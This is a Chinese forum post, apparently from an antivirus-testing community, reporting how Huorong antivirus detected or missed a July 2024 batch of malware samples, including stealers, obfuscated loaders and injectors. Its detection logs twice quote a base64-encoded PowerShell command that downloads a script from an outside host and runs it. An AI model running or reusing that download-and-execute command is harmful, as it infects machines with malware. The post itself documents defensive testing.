本帖最后由 aboringman 于 2024-7-18 22:50 编辑
你没有更新病毒库吧,我这里杀5个
- 风险路径:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\decoded.ps1, 病毒名:ADV:TrojanSpy/PS.Stealer!meteor, 病毒ID:355bcd22ea5ec33a, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\EXECUTE_.exe, 病毒名:ADV:VirTool/MSIL.Obfuscator!meteor, 病毒ID:9b3fa4092c57ea79, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\j2RUN.exe, 病毒名:ADV:VirTool/MSIL.Obfuscator!meteor, 病毒ID:9b3fa4092c57ea79, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\SapphireX.exe, 病毒名:ADV:VirTool/Obfuscator!meteor, 病毒ID:b6b4d4a297409986, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\Built.exe, 病毒名:TrojanSpy/Python.Stealer.d, 病毒ID:d06410f9a3897eb1, 处理结果:已处理,删除文件
不开的话只能杀1个。。。。。。
- 风险路径:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\Built.exe, 病毒名:TrojanSpy/Python.Stealer.d, 病毒ID:d06410f9a3897eb1, 处理结果:已处理,删除文件
双击部分:
Adobe.msi:寄,畅通无阻甚至好像还更新了版本( 看来火绒对国外的后门远控大意了啊,没有闪( )
EXECUTE_.exe:本体被干掉,杀1衍生物
- 病毒名称:Trojan/Injector.RA
- 病毒路径:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\EXECUTE_.exe
- 操作结果:已处理
- 进程ID:10236
- 操作进程命令行:"C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\EXECUTE_.exe"
- 父进程ID:5408
- 父进程:C:\Windows\explorer.exe
- 父进程命令行:C:\Windows\Explorer.EXE
j2RUN.exe:杀1衍生物(跟EXECUTE_.exe这个应该是同源,但是没有触发内存防护)
- 病毒名称:TrojanSpy/Stealer.lf
- 病毒ID:31CF10BB4786F717
- 病毒路径:C:\Users\Killer\AppData\Roaming\d3d9.dll
- 操作类型:修改
- 操作结果:已处理,删除文件
- 进程ID:828
- 操作进程:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\j2RUN.exe
- 操作进程命令行:"C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\j2RUN.exe"
- 父进程ID:5408
- 父进程:C:\Windows\explorer.exe
listafamilia_caipira.doc:
放行
- 病毒名称:Trojan/MSIL.Injector.fx
- 病毒ID:87EB3A7B00E30394
- 虚拟地址:0x0000000000400000
- 映像大小:184KB
- 是否完整映像:否
- 数据流哈希:cbf6bc92
- 操作结果:已处理
- 进程ID:8512
- 操作进程:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
- 操作进程命令行:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
- 父进程ID:9884
- 父进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- 父进程命令行:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AaABtAGgAZQBhAGwAdABoAHMAZQByAHYAaQBjAGUAcwAuAGkAbgAvAGEAZABtAGkAbgAvAGoAcwAvAHMAcQBqAHgASAB0AFoAUQBpADgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
- 病毒名称:Trojan/MSIL.Injector.fx
- 病毒ID:87EB3A7B00E30394
- 虚拟地址:0x0000000000400000
- 映像大小:184KB
- 是否完整映像:否
- 数据流哈希:751819cb
- 操作结果:已处理
- 进程ID:5512
- 操作进程:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
- 操作进程命令行:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
- 父进程ID:2480
- 父进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- 父进程命令行:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AaABtAGgAZQBhAGwAdABoAHMAZQByAHYAaQBjAGUAcwAuAGkAbgAvAGEAZABtAGkAbgAvAGoAcwAvAHMAcQBqAHgASAB0AFoAUQBpADgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
decoded.ps1:无拦截
SapphireX.exe:
Software1.30.1.exe:(跟SapphireX.exe同源)
Vanban_8647_cuong_che_thi_hanh_quyet_dinh.pdf.lnk:C2已寄(?) |
楼主: QVM360
发表于 2024-7-18 22:18:15
